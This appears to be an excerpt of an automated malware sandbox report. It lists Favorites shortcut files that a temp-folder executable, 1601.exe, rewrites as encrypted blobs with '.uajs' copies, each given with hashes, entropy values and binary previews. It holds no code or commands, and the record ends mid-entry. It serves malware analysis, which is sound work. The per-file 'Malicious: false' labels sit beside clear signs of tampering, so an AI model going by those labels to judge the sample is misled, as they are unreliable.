Preview:	ZIPXYT........-.D...f...b..z...6...r'95...(2..,.F..k{[d.S.U1..............x.2BU?1!.!O...~..f<...6....]_.yD.-.2.zW"......K....z....Q!...p..}[.7.....ZtLo'...E....`.i...K...........Q.x.2}......X..N.../>....q0d:...d..6&..~P..F..q'\|-@bm4pN.(.d8......'FZ.n.f..dy..7..=.wWe....../....._>q..!f..,.^.j).,..Gf..9.........z..a...[..6J.?.i5.....ORH?...M.&.P[...Q.m.\C.y.p..~..A.......O..&MR</;..qs..Q.o.'fp...y+.K .R...P.6\|..v\|...AE.. ....."l...g.;......'..6...#...).A.0.b.R.94B0...YD;. .0..............\..."9..Dm.....AtC.h..\|^......0C.F...{0.f..?..a..R.h`.....}:..l.V.X.E@.bh/thE.J.n.f.[!....I...[..w.8.......b..R./.Z...........D.....7..I.T.N# ."&.. ....8+(...l[f.i.l'.3..3.tg.@......ymc..,........z.~/.-..U.-.........px..._....K...V..h..x\|r....V.6.oY..+@#..c.i.[.=.T...N...7H.f.....w."t.S.se".5.E5..G....if\|..N..'M..z.....-....1\......._`H.....Amx.Z.v..Xr.....w.g.7h...&Z.i.!G....p"....eq-F....d.ye,..6.f.QdX.(....\.Rzb^qLp.Z`.Jzl?..ic#..A..X=:;>s...0.C.5..

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.353824114163559
Encrypted:	false
SSDEEP:	12:H8MXlMbpm/0FNAFuUtX+LbyKw+ULCfwoqw1cii9a:FK1msEFOeKPIw1bD
MD5:	1564893321D22A3161B2EF4644987E0F
SHA1:	3314B6A0E795DC65E2F3F1F75DCB542C6F5662E8
SHA-256:	06DB163F130AEEA4BE2037AF74BFB3C5E4DFAD8F97B96FD35F0B39E14D4D9BE5
SHA-512:	0687DF2EBEAC761E3F5973B82B6194FCCF803C3894EA7CD739BAC85CAC4C3421058214132298F757408B4CDF3D66CBFBD0FA3E31D1B395C4EABFDCA0E136BD0F
Malicious:	false
Preview:	[{000...2..6.7S..m...-.....\!.j..l.....t....:i..EA.%.r.7J.}...d.3^'\.(0.....'...(R\E7.t.l.Y.2Q9..=..L.c .....&o...5a........U.t..x.?.....u......[.w.R..f.Uu..o....W.yt...)...!O0A......>H...[..d..*VH.@.I..9..d..........H...j.5...).p...2.....@..'q.7..f..f...[.3... ......gu=.wa.[S..m\|..il.,X.u.K50....h.D=Fe.[R...r..d.U.'.\...!.Rr..:.;.y../.V.S....y.X.V:TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Amazon.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.353824114163559
Encrypted:	false
SSDEEP:	12:H8MXlMbpm/0FNAFuUtX+LbyKw+ULCfwoqw1cii9a:FK1msEFOeKPIw1bD
MD5:	1564893321D22A3161B2EF4644987E0F
SHA1:	3314B6A0E795DC65E2F3F1F75DCB542C6F5662E8
SHA-256:	06DB163F130AEEA4BE2037AF74BFB3C5E4DFAD8F97B96FD35F0B39E14D4D9BE5
SHA-512:	0687DF2EBEAC761E3F5973B82B6194FCCF803C3894EA7CD739BAC85CAC4C3421058214132298F757408B4CDF3D66CBFBD0FA3E31D1B395C4EABFDCA0E136BD0F
Malicious:	false
Preview:	[{000...2..6.7S..m...-.....\!.j..l.....t....:i..EA.%.r.7J.}...d.3^'\.(0.....'...(R\E7.t.l.Y.2Q9..=..L.c .....&o...5a........U.t..x.?.....u......[.w.R..f.Uu..o....W.yt...)...!O0A......>H...[..d..*VH.@.I..9..d..........H...j.5...).p...2.....@..'q.7..f..f...[.3... ......gu=.wa.[S..m\|..il.,X.u.K50....h.D=Fe.[R...r..d.U.'.\...!.Rr..:.;.y../.V.S....y.X.V:TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.563195664874847
Encrypted:	false
SSDEEP:	12:6f69BfOA2o7+k07tv4QuDgegXaA+mgVCKHJEwTneNoqw1cii9a:6S9BfOE7+PGTv7HyOetw1bD
MD5:	0D8B8B8B037A5A1D1B37C022A9810CC8
SHA1:	2C3B057145E16D1BD4617E39E2D6AC943B291047
SHA-256:	68ECE6E2493EB7C5449836C75FA581BF7D3FEA9EE81E9F5B2F71B4B4AEBB6693
SHA-512:	1A3DC81A6221542FE95F0D6E969A7E0BE10550D9F1C3603ED69830D0673482F4CC15C6E59D811FA39C5E4AF05BD88DBDB9E68019162C99683A2B186D5E51BE57
Malicious:	false
Preview:	[{000..\R.>......}.!....y%...."..?........-y-5".=,.}....B...,....~.........B...\|.....H...8}'k.......57..X...M^..=.....6.9..U_.....D.-).\|O...}..5p.%..vW.......C......7.D.......m....B..-V.L...Kc...&.7.?...H.q.K.:o...)S......j}8.....-@.W...ZWF...3##R..\m..w2/C.<......D70u*.R....k.<.>`.. .?'...B._.q...%....;.j.=.I..j....,.-"~t3...nJ..p..k!P...2. .2...'6.......E#..0...(2....%.V0g....n:.F0.)...gs.hY\|.v.1....[H..Y<.8.G..C\|F6.4...Q.....k..I.&d......TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.563195664874847
Encrypted:	false
SSDEEP:	12:6f69BfOA2o7+k07tv4QuDgegXaA+mgVCKHJEwTneNoqw1cii9a:6S9BfOE7+PGTv7HyOetw1bD
MD5:	0D8B8B8B037A5A1D1B37C022A9810CC8
SHA1:	2C3B057145E16D1BD4617E39E2D6AC943B291047
SHA-256:	68ECE6E2493EB7C5449836C75FA581BF7D3FEA9EE81E9F5B2F71B4B4AEBB6693
SHA-512:	1A3DC81A6221542FE95F0D6E969A7E0BE10550D9F1C3603ED69830D0673482F4CC15C6E59D811FA39C5E4AF05BD88DBDB9E68019162C99683A2B186D5E51BE57
Malicious:	false
Preview:	[{000..\R.>......}.!....y%...."..?........-y-5".=,.}....B...,....~.........B...\|.....H...8}'k.......57..X...M^..=.....6.9..U_.....D.-).\|O...}..5p.%..vW.......C......7.D.......m....B..-V.L...Kc...&.7.?...H.q.K.:o...)S......j}8.....-@.W...ZWF...3##R..\m..w2/C.<......D70u*.R....k.<.>`.. .?'...B._.q...%....;.j.=.I..j....,.-"~t3...nJ..p..k!P...2. .2...'6.......E#..0...(2....%.V0g....n:.F0.)...gs.hY\|.v.1....[H..Y<.8.G..C\|F6.4...Q.....k..I.&d......TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.386806798801048
Encrypted:	false
SSDEEP:	12:Ydo/xi49NcqExIq65vrIvLFPb8s4n2UwnSpgpoqw1cii9a:wo/xi4NEuHExDgUnMyw1bD
MD5:	9CC4107AD710DCFB6E12BE936E56F705
SHA1:	4394013F5087187FAAC781D455036F7EE1F9DFD7
SHA-256:	37F2452A9DCC54B78138314E3C36D678764338819F7C9BAB7B75043CA71B30D7
SHA-512:	3AF2FC46BA14BD5CF3E56F08DD8DA333330153DC7081A9368F502210C4122CD8C5D47A909044432A239E2480D32CDDF004190293305923D2FCA91E5374F6984C
Malicious:	false
Preview:	[{000.V.../8O.S.....1...^.m+d........3.x&.K.y9X..Yv.}y8./.W..k....C.Dk....7.9..... X..$[.CK...8Dc..a........p..."..z.....w.p...:.Ke.MR.{.5...z.l.7....z..c..S4B9.l;.{.b.Z...2...C.0..:.....'....x...*.9.^.g...#.....].I...!s...d.xO....W..v~...>.3..r.h'.H..9....l.V.m......V..!..y..N..f.....q..5...8....Je"."..Y..&.R.;..F......=.[1w.q..Vs..>.u..~@.. .+..TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.386806798801048
Encrypted:	false
SSDEEP:	12:Ydo/xi49NcqExIq65vrIvLFPb8s4n2UwnSpgpoqw1cii9a:wo/xi4NEuHExDgUnMyw1bD
MD5:	9CC4107AD710DCFB6E12BE936E56F705
SHA1:	4394013F5087187FAAC781D455036F7EE1F9DFD7
SHA-256:	37F2452A9DCC54B78138314E3C36D678764338819F7C9BAB7B75043CA71B30D7
SHA-512:	3AF2FC46BA14BD5CF3E56F08DD8DA333330153DC7081A9368F502210C4122CD8C5D47A909044432A239E2480D32CDDF004190293305923D2FCA91E5374F6984C
Malicious:	false
Preview:	[{000.V.../8O.S.....1...^.m+d........3.x&.K.y9X..Yv.}y8./.W..k....C.Dk....7.9..... X..$[.CK...8Dc..a........p..."..z.....w.p...:.Ke.MR.{.5...z.l.7....z..c..S4B9.l;.{.b.Z...2...C.0..:.....'....x...*.9.^.g...#.....].I...!s...d.xO....W..v~...>.3..r.h'.H..9....l.V.m......V..!..y..N..f.....q..5...8....Je"."..Y..&.R.;..F......=.[1w.q..Vs..>.u..~@.. .+..TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.399144431015331
Encrypted:	false
SSDEEP:	12:gC/FHiBLXrSpoVCOsNwSI0HX6xoUnUNoqw1cii9a:gW2yOsNwGEoUnUtw1bD
MD5:	854E04873905970B43C64134574E8696
SHA1:	B85095848405C303E012E912E82C54C5E8761951
SHA-256:	EE54A5AC4632E75B5741280C04105182360B3D190FADE28E167BB9C7BCA0E04D
SHA-512:	B15996E5053F70D1FE019F3F68F457B639C806CCA298420D1881F74E40E9F7264491C0EC8259B747AC0C58E0FE0C8D4307E6AD25D4C0F339CD13AD5947926D2F
Malicious:	false
Preview:	[{000......_?.0....C ..Da.Ye....5X(C.U..]..8(.....N..sH.......1;+.c[7uG>6....AJ.e....CzX.>;..;..q..&\Y.\|D=......ig.;j.JC...C....k......~.+..eN.....U.\&.Ht.....xr.q?...L..K....r.5..Vm.iG ....d..f.`....!..+}..h...+5..x.C..G"a...`.*:..#F.9...ZcU.MT...,..iF..=..){l..)+j...Q$..%...@mJ/....}8A..R.S).,...T..NU.p..'/\....._MG;.H...M1Nf.rx....GpP....}...-H.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.399144431015331
Encrypted:	false
SSDEEP:	12:gC/FHiBLXrSpoVCOsNwSI0HX6xoUnUNoqw1cii9a:gW2yOsNwGEoUnUtw1bD
MD5:	854E04873905970B43C64134574E8696
SHA1:	B85095848405C303E012E912E82C54C5E8761951
SHA-256:	EE54A5AC4632E75B5741280C04105182360B3D190FADE28E167BB9C7BCA0E04D
SHA-512:	B15996E5053F70D1FE019F3F68F457B639C806CCA298420D1881F74E40E9F7264491C0EC8259B747AC0C58E0FE0C8D4307E6AD25D4C0F339CD13AD5947926D2F
Malicious:	false
Preview:	[{000......_?.0....C ..Da.Ye....5X(C.U..]..8(.....N..sH.......1;+.c[7uG>6....AJ.e....CzX.>;..;..q..&\Y.\|D=......ig.;j.JC...C....k......~.+..eN.....U.\&.Ht.....xr.q?...L..K....r.5..Vm.iG ....d..f.`....!..+}..h...+5..x.C..G"a...`.*:..#F.9...ZcU.MT...,..iF..=..){l..)+j...Q$..%...@mJ/....}8A..R.S).,...T..NU.p..'/\....._MG;.H...M1Nf.rx....GpP....}...-H.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.451145325476067
Encrypted:	false
SSDEEP:	6:JR7gpb8rbVoXpRm51t65GzXnT0zKKrdLZtPpF+waMhbZUi3ckrbEUbeiU9AGRsoB:eb8g6454DKTn6wVOi3/rghCoqw1cii9a
MD5:	100490E43E7221B4D9E10920008A84BF
SHA1:	B77A74E698D0781DB90EF547C9465A93772EFF76
SHA-256:	64B1C85994513CABBDFCB61A03D5B8A44FF6E67F0B69E5C09661E8BF5658BA65
SHA-512:	7648F4C9CEC6D76EBF5F9A6228CF149CC906480F098CA973ECA3D631BFE638CE6DB41D48E05DC81B95794C3F628104F64230FD519C8144E730E62B179CF06FCA
Malicious:	false
Preview:	[{000.g.....s. ...6.W.......m...v.._..q.....S.q../T...c..w....c.......^...7....w.X..u.N.P.j..Tt#...{..r..........@x....`..T...."`ld!...R:.1k_.W...c..6.....I.:....C.FVpp..o...BP..4.m..]y$.....E........8..^....!...2..7PX.<.....i&[7&...kNfy$.>8.....u..\|..e.n.I."@...Io....3.........+.l.....@.p...~.....S.......e>T.....`=.......k................'3.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.451145325476067
Encrypted:	false
SSDEEP:	6:JR7gpb8rbVoXpRm51t65GzXnT0zKKrdLZtPpF+waMhbZUi3ckrbEUbeiU9AGRsoB:eb8g6454DKTn6wVOi3/rghCoqw1cii9a
MD5:	100490E43E7221B4D9E10920008A84BF
SHA1:	B77A74E698D0781DB90EF547C9465A93772EFF76
SHA-256:	64B1C85994513CABBDFCB61A03D5B8A44FF6E67F0B69E5C09661E8BF5658BA65
SHA-512:	7648F4C9CEC6D76EBF5F9A6228CF149CC906480F098CA973ECA3D631BFE638CE6DB41D48E05DC81B95794C3F628104F64230FD519C8144E730E62B179CF06FCA
Malicious:	false
Preview:	[{000.g.....s. ...6.W.......m...v.._..q.....S.q../T...c..w....c.......^...7....w.X..u.N.P.j..Tt#...{..r..........@x....`..T...."`ld!...R:.1k_.W...c..6.....I.:....C.FVpp..o...BP..4.m..]y$.....E........8..^....!...2..7PX.<.....i&[7&...kNfy$.>8.....u..\|..e.n.I."@...Io....3.........+.l.....@.p...~.....S.......e>T.....`=.......k................'3.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.419073333118601
Encrypted:	false
SSDEEP:	12:HBeuMcyQQU2Brn90kHIN7ICyBkiXcVoxg0moqw1cii9a:9yFJrnGkoNUXcVQ2w1bD
MD5:	3CE9D1A293BC7858E10791762BFD949C
SHA1:	5233453BA9342005B6E5A66215C7853966AD7470
SHA-256:	92BD81104BB8879FEEEC397014018ECC57129FA746F12EC34262E2F0071FF859
SHA-512:	3FEC112F799B9F5DC4FFEB519A1CBC281A66FC0983C1E516F2248CBF542F8C3D6B7B86B2F07B03D98927C2F9FD4D153B5480DD415C542E8D4C3F181AD663833F
Malicious:	false
Preview:	[{000..).....K...!P+..(.F"...)u;nL@R..0...t.....wd.c=.=S./..u.~8lI^.\-e..}..{.q.....J.y..R...0...<T.......u.......mP..y.A...9.....x.....]<Z.5O.3{..xlO.e......j...X.mO..M?28.......H<..e...4=.]f~q.#...L.....+Em.[h.:...$..C....\a.ut.#..[O$.x{.../...3.........he...H.EW.x....fO.6.+..."...Y..q.v.YW....@......].......7.[.O..5.c.y6.q....a.....Y.*.}..RvyTkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.419073333118601
Encrypted:	false
SSDEEP:	12:HBeuMcyQQU2Brn90kHIN7ICyBkiXcVoxg0moqw1cii9a:9yFJrnGkoNUXcVQ2w1bD
MD5:	3CE9D1A293BC7858E10791762BFD949C
SHA1:	5233453BA9342005B6E5A66215C7853966AD7470
SHA-256:	92BD81104BB8879FEEEC397014018ECC57129FA746F12EC34262E2F0071FF859
SHA-512:	3FEC112F799B9F5DC4FFEB519A1CBC281A66FC0983C1E516F2248CBF542F8C3D6B7B86B2F07B03D98927C2F9FD4D153B5480DD415C542E8D4C3F181AD663833F
Malicious:	false
Preview:	[{000..).....K...!P+..(.F"...)u;nL@R..0...t.....wd.c=.=S./..u.~8lI^.\-e..}..{.q.....J.y..R...0...<T.......u.......mP..y.A...9.....x.....]<Z.5O.3{..xlO.e......j...X.mO..M?28.......H<..e...4=.]f~q.#...L.....+Em.[h.:...$..C....\a.ut.#..[O$.x{.../...3.........he...H.EW.x....fO.6.+..."...Y..q.v.YW....@......].......7.[.O..5.c.y6.q....a.....Y.*.}..RvyTkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.441158620516702
Encrypted:	false
SSDEEP:	12:kd29ZOXiUIT19lZvvmOJ8WH/iilzHoqw1cii9a:kd2v5TLlpvm74vJXw1bD
MD5:	59AF408FAA3358A42D1576A6BAD5E0E4
SHA1:	C8F3E347733E3918E492A89BF5CA45C54A28B2D5
SHA-256:	1584B694EE8410827D98291F6762E4B3E2A46F21389A030AC5024657DA423125
SHA-512:	6C1BC9C7F69C40AF6D9228B36F3E83FEAD0E4028905E24CFA433408E57930320D0A5F660F930614062C8B109CA6F518C20CC4645DD7C0E5DA4BFDA48F6A08CFD
Malicious:	false
Preview:	[{000.9ua...V..k..!pUE.z.U.O.bV........./...e..;.. .D#...Zn.'p.....Z.......2".!K...!....Q.%...f..KA.D.*...B........`..&..g....~.A..}..sB......'.]"7\..lZ../..W..>.......&KW..$....;...+ ...L...$Eg.c..DX9..b3.ix..;..bj.&.T5o..q_......U.u......CE.....t....m...Q...e...L..5.I..Z......)..R............'.Eq..5.BmL....9=.k.R..~...!q.....a..o.+R.6..NpsHT`H.my..TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.441158620516702
Encrypted:	false
SSDEEP:	12:kd29ZOXiUIT19lZvvmOJ8WH/iilzHoqw1cii9a:kd2v5TLlpvm74vJXw1bD
MD5:	59AF408FAA3358A42D1576A6BAD5E0E4
SHA1:	C8F3E347733E3918E492A89BF5CA45C54A28B2D5
SHA-256:	1584B694EE8410827D98291F6762E4B3E2A46F21389A030AC5024657DA423125
SHA-512:	6C1BC9C7F69C40AF6D9228B36F3E83FEAD0E4028905E24CFA433408E57930320D0A5F660F930614062C8B109CA6F518C20CC4645DD7C0E5DA4BFDA48F6A08CFD
Malicious:	false
Preview:	[{000.9ua...V..k..!pUE.z.U.O.bV........./...e..;.. .D#...Zn.'p.....Z.......2".!K...!....Q.%...f..KA.D.*...B........`..&..g....~.A..}..sB......'.]"7\..lZ../..W..>.......&KW..$....;...+ ...L...$Eg.c..DX9..b3.ix..;..bj.&.T5o..q_......U.u......CE.....t....m...Q...e...L..5.I..Z......)..R............'.Eq..5.BmL....9=.k.R..~...!q.....a..o.+R.6..NpsHT`H.my..TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.428453867892631
Encrypted:	false
SSDEEP:	12:jT9JelK5TmrAlR59MwkpKryFormoqw1cii9a:j5J6KmrQaw6Kruw1bD
MD5:	A578B7D15FA27B8AE5EAA1FA9BDCDFA7
SHA1:	2DAD3F7F060148837CB2E873929DA7F8DA787FA4
SHA-256:	D58161949AEA3294E48228D675D40AF02D29A39C369F72CFE74D7D6E8605FE93
SHA-512:	89C383A01636CDA37B94E15BE65BDBF9340D0ED952975AC44F775362231A353A4D973A12ABDDC6BC021E4D3FBD5891AB92447E9837707778D756D6FA6BF62742
Malicious:	false
Preview:	[{000?..s...).....d#wj=....u.mQZ.F.I.@...)[...Xa....M..:.:.\.=........Ug5....... .v..".^...;.....Z\2....Ep.`0)... .K..{pq.%.......FL.T......!....q.q08....4w.d.\.]..$.n....+.....kVa........,.......4.B.`..U.a.\|I....JS.I.p..^....n=..y......)M..C.d.Y..iV...\|~..a...!Iz, ..'...7.5..u\.\|...O.....E-T..,...el........K/58F.P....9....eX..Z.BB.H..zg.....)A.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.428453867892631
Encrypted:	false
SSDEEP:	12:jT9JelK5TmrAlR59MwkpKryFormoqw1cii9a:j5J6KmrQaw6Kruw1bD
MD5:	A578B7D15FA27B8AE5EAA1FA9BDCDFA7
SHA1:	2DAD3F7F060148837CB2E873929DA7F8DA787FA4
SHA-256:	D58161949AEA3294E48228D675D40AF02D29A39C369F72CFE74D7D6E8605FE93
SHA-512:	89C383A01636CDA37B94E15BE65BDBF9340D0ED952975AC44F775362231A353A4D973A12ABDDC6BC021E4D3FBD5891AB92447E9837707778D756D6FA6BF62742
Malicious:	false
Preview:	[{000?..s...).....d#wj=....u.mQZ.F.I.@...)[...Xa....M..:.:.\.=........Ug5....... .v..".^...;.....Z\2....Ep.`0)... .K..{pq.%.......FL.T......!....q.q08....4w.d.\.]..$.n....+.....kVa........,.......4.B.`..U.a.\|I....JS.I.p..^....n=..y......)M..C.d.Y..iV...\|~..a...!Iz, ..'...7.5..u\.\|...O.....E-T..,...el........K/58F.P....9....eX..Z.BB.H..zg.....)A.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.469636124530708
Encrypted:	false
SSDEEP:	12:NH14y40f0YnDbWuVWLhMr1tsx0lh9oqw1cii9a:R4RyfNVPtsmw1bD
MD5:	8E11230B23E959A4828C6EFDC0BDD8DB
SHA1:	E4F3E07EE8EDA9A07E7F3F285C9CA2B4B5652908
SHA-256:	7926D161292862D117F01DA99F6370F8A3A13300B2182784D2F952BDB7B50608
SHA-512:	CD2C3048FCE5AAE2800CEDFC63F5CC70356A03856F3BF340F9C1AA36FCFF395899E4C518875F86EFA12E2B267A6152B0B88A30DC04B165B45E9FE6247210085D
Malicious:	false
Preview:	[{000R..gV.o..B5X..x..f.hg.....K.1.#.q.N..c...z........(...U.V..\|...l.6J.J....]%8.2..X._..}f2t.\....l...F..1f,&.... .....S.Y..5...@......aJ..!BlQ .3..`8.....I...>....&..8.K...L..8g].E?.%kj.p..Q.K.6...ro.e.Q.at..j....s..k...j.2.?_h....;....E....PF.J...\|..I!f:....v....8......d.j....\.q\.q....!..y.zG..O..d5..i^..#f..!.h.R...f.p.nM..K<=...X..-...(.O..jkA^TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.469636124530708
Encrypted:	false
SSDEEP:	12:NH14y40f0YnDbWuVWLhMr1tsx0lh9oqw1cii9a:R4RyfNVPtsmw1bD
MD5:	8E11230B23E959A4828C6EFDC0BDD8DB
SHA1:	E4F3E07EE8EDA9A07E7F3F285C9CA2B4B5652908
SHA-256:	7926D161292862D117F01DA99F6370F8A3A13300B2182784D2F952BDB7B50608
SHA-512:	CD2C3048FCE5AAE2800CEDFC63F5CC70356A03856F3BF340F9C1AA36FCFF395899E4C518875F86EFA12E2B267A6152B0B88A30DC04B165B45E9FE6247210085D
Malicious:	false
Preview:	[{000R..gV.o..B5X..x..f.hg.....K.1.#.q.N..c...z........(...U.V..\|...l.6J.J....]%8.2..X._..}f2t.\....l...F..1f,&.... .....S.Y..5...@......aJ..!BlQ .3..`8.....I...>....&..8.K...L..8g].E?.%kj.p..Q.K.6...ro.e.Q.at..j....s..k...j.2.?_h....;....E....PF.J...\|..I!f:....v....8......d.j....\.q\.q....!..y.zG..O..d5..i^..#f..!.h.R...f.p.nM..K<=...X..-...(.O..jkA^TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.453797217641465
Encrypted:	false
SSDEEP:	12:SmyW/U0ZoJBBw27Qn3IKxyaboqw1cii9a:LyWboJBKEJKsEw1bD
MD5:	1F09AC32B75D85E62485D83F5F877CD8
SHA1:	78897B37A60B856D46FE11E4C8A86B7FE800A5AC
SHA-256:	732F98BE5F945046B1247CDDD2EE1896B256DFF9C3FDCA772636795E2B5CB472
SHA-512:	7B3B000171CE549C6862397DF1593F7E721063BA3EBC7F478DCB00F8CEF2A885BA4E668E25CD000689C2DC21BC162987092467EAF827B6125F0D6F7C3D07BF00
Malicious:	false
Preview:	[{000.7.&?.....!.0.......d3xK...P....E..v^.;...C0(....\|.U.........K.(...c....7.K.E..SQ....d.........#...r^J\|/9..L.....L.....^.B.....SZ.M....d........^./.?.f.o..B`.(.m.w)..8.....Wu..dA.XU..U\|.h...$a.....}...l.bI"..]h......OzO.....7.&.yg...H1R.y).wF.?...@.rtvn...LZT..v..wec.XE2#..T],f..4m...i3......4.+3...\.-9.Yl...T;.CS.O+....K...v<.>.c...w_...R.x..(.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.453797217641465
Encrypted:	false
SSDEEP:	12:SmyW/U0ZoJBBw27Qn3IKxyaboqw1cii9a:LyWboJBKEJKsEw1bD
MD5:	1F09AC32B75D85E62485D83F5F877CD8
SHA1:	78897B37A60B856D46FE11E4C8A86B7FE800A5AC
SHA-256:	732F98BE5F945046B1247CDDD2EE1896B256DFF9C3FDCA772636795E2B5CB472
SHA-512:	7B3B000171CE549C6862397DF1593F7E721063BA3EBC7F478DCB00F8CEF2A885BA4E668E25CD000689C2DC21BC162987092467EAF827B6125F0D6F7C3D07BF00
Malicious:	false
Preview:	[{000.7.&?.....!.0.......d3xK...P....E..v^.;...C0(....\|.U.........K.(...c....7.K.E..SQ....d.........#...r^J\|/9..L.....L.....^.B.....SZ.M....d........^./.?.f.o..B`.(.m.w)..8.....Wu..dA.XU..U\|.h...$a.....}...l.bI"..]h......OzO.....7.&.yg...H1R.y).wF.?...@.rtvn...LZT..v..wec.XE2#..T],f..4m...i3......4.+3...\.-9.Yl...T;.CS.O+....K...v<.>.c...w_...R.x..(.TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.769418229110851
Encrypted:	false
SSDEEP:	24:fmCxuTol16f8LcVDc0D5sVNNeq2dtL3z2Tz0JCgkOw1bD:fbl16f9V0NgtL3zC0JCkyD
